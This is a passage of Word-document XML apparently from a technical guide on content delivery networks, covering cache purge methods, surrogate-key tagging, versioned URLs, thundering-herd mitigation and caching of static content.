        <w:t>Purge: https://cdn.example.com/images/product-123.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C205AC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Fast, precise. Invalidates exactly one cached object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766078AA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wildcard/prefix purge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E020226" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E195753" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Purge: https://cdn.example.com/images/product-123*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37FE2C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Removes all objects matching the pattern. More expensive (requires scanning cache index).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E8A7E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tag-based purge (surrogate keys):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B3D992" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE68B1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin response: Surrogate-Key: product-123 category-electronics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3200D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Purge: Tag = "product-123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F214CB7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ Invalidates ALL responses tagged with "product-123" (product page, thumbnails, API responses, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88F8F3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is the most powerful invalidation pattern:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> When product 123 changes, one purge by tag invalidates everything related to it across the entire CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C34E67" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How tag-based purge works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3B43D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin includes Surrogate-Key header in responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06465471" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN stores a mapping: tag → [list of cache keys tagged with it].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53222314" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>On purge-by-tag: CDN looks up all cache keys associated with the tag, marks them all invalid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA8A0AA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Propagates invalidation to all PoPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632870E6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purge propagation time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21800AE9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Within a single PoP: milliseconds (just mark as invalid in cache index).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F60F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Global (all PoPs): 1–30 seconds (depending on CDN provider's internal propagation mechanism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6BE4A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cloudflare: &lt; 150ms globally (aggressive internal push).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEF454" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CloudFront: 60–120 seconds (eventual propagation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4FED05" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Fastly: &lt; 200ms globally (instant purge is their key differentiator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64449CA0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Versioned URLs (Cache Busting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37398EBA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The most reliable invalidation strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36253EED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Never invalidate old content. Instead, create a NEW URL for new content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEBDD44" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C946B5E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Old: /assets/style.v1.css  (cached forever, TTL=1 year)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7E40C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>New: /assets/style.v2.css  (new URL, cached forever)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F244D3E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="4EB415CB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Or with content hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB4F784" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Old: /assets/style.a1b2c3d4.css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52887CF0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>New: /assets/style.e5f6g7h8.css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592DD1F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDBBA5B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTML references style.a1b2c3d4.css.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01890A8E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN caches it with max-age=31536000 (1 year).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0166A6BB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>You deploy a new CSS file. Build tool generates style.e5f6g7h8.css.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A170FCD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTML now references the new URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C615D5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTML itself has a short TTL (e.g., 60 seconds) → browser fetches new HTML quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67405C40" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>New HTML points to new CSS URL → cache miss → fetches new CSS → caches for 1 year.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1FF538" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Old CSS naturally expires (or is evicted) over time. No purge needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F2363" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is best practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD4FBA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No race conditions (old URL always serves old content, new URL always serves new content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06786658" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>No purge propagation delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FAF44A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Maximum cache TTL (1 year) = maximum hit ratio = maximum performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7AAF2C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Works even if CDN purge is delayed or fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F013A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Framework support: webpack, Vite, Next.js all generate content-hashed filenames automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFEEA88" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Only works for resources referenced by another document (assets referenced by HTML). Doesn't work for the HTML document itself (users bookmark/share the canonical URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7842CA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 The Thundering Herd on Invalidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A721FD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CFC23F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Popular object cached at 300 edges (TTL = 3600s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BD4D6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>You purge it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700E970" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>All 300 edges simultaneously have a miss on the next request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59084367" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>If 1000 users per edge request it: 300,000 concurrent requests hit origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0EBED4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin is overwhelmed → crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BBA0E3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E17DE16" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request coalescing at shield:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AFBF9F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>All 300 edge misses go to shield.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3556F122" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Shield sends ONE request to origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D6BEF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin handles 1 request, not 300,000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D28DB5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Soft purge (mark stale, don't delete):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63934972" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Instead of deleting the cached content, mark it as "stale."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24757B73" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Continue serving the stale content while asynchronously fetching fresh content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0DA6DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Only ONE request goes to origin (the first miss triggers background refresh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C7866B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Users get the old content for a brief moment but experience zero latency penalty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C5C55" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-warming after purge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF2230" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>After purging, immediately push new content to all edges (don't wait for user requests to trigger misses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF6834" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin proactively sends new content to CDN edges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D416D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Eliminates the miss entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D39E5B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="64DE034E">
          <v:rect id="_x0000_i4687" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="626EE5E5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. CDN for Different Content Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376750E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Static Content (The "Classic" CDN Use Case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02758563" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Images, CSS, JavaScript, fonts, videos, documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718ADEA2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BEB7B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Very long TTL (1 year) with versioned filenames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD5BD8D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, max-age=31536000, immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5AB68" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>immutable tells the browser: don't even bother revalidating (the URL will never serve different content).</w:t>
      </w:r>
    </w:p>
